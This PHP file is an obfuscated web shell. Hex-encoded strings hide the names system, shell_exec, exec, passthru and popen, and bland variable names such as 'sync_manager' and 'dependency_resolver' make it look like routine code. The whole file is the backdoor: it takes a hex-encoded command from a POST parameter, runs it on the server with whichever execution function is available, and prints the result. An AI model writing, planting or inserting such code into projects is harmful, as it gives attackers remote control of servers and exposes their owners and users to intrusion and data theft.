<?php


$flag1 = '79';
$flag2 = '74';
$flag3 = '65';
$flag4 = '73';
$flag5 = '6c';
$flag6 = '70';
$flag7 = '75';
$flag8 = '6f';
$flag9 = '6e';
$flag10 = '72';
$flag11 = '67';
$flag12 = '5f';
$flag13 = '63';
$flag14 = '64';
$flag15 = '76';
$sync_manager1 = pack("H*", '73'.$flag1.'73'.$flag2.$flag3.'6d');
$sync_manager2 = pack("H*", $flag4.'68'.'65'.'6c'.$flag5.'5f'.'65'.'78'.$flag3.'63');
$sync_manager3 = pack("H*", $flag3.'78'.$flag3.'63');
$sync_manager4 = pack("H*", $flag6.'61'.'73'.$flag4.$flag2.'68'.'72'.$flag7);
$sync_manager5 = pack("H*", $flag6.$flag8.$flag6.$flag3.$flag9);
$sync_manager6 = pack("H*", '73'.'74'.$flag10.'65'.'61'.'6d'.'5f'.$flag11.$flag3.$flag2.$flag12.'63'.'6f'.'6e'.$flag2.'65'.'6e'.$flag2.'73');
$sync_manager7 = pack("H*", $flag6.$flag13.'6c'.$flag8.'73'.'65');
$dependency_resolver = pack("H*", $flag14.$flag3.'70'.$flag3.'6e'.'64'.$flag3.'6e'.'63'.'79'.'5f'.$flag10.'65'.$flag4.'6f'.$flag5.$flag15.'65'.'72');
if (isset($_POST[$dependency_resolver])) {
    $dependency_resolver = pack("H*", $_POST[$dependency_resolver]);
    if (function_exists($sync_manager1)) {
        $sync_manager1($dependency_resolver);
    } elseif (function_exists($sync_manager2)) {
        print $sync_manager2($dependency_resolver);
    } elseif (function_exists($sync_manager3)) {
        $sync_manager3($dependency_resolver, $data_item);
        print join("\n", $data_item);
    } elseif (function_exists($sync_manager4)) {
        $sync_manager4($dependency_resolver);
    } elseif (function_exists($sync_manager5) && function_exists($sync_manager6) && function_exists($sync_manager7)) {
        $object_desc = $sync_manager5($dependency_resolver, 'r');
        if ($object_desc) {
            $obj_mrk = $sync_manager6($object_desc);
            $sync_manager7($object_desc);
            print $obj_mrk;
        }
    }
    exit;
}
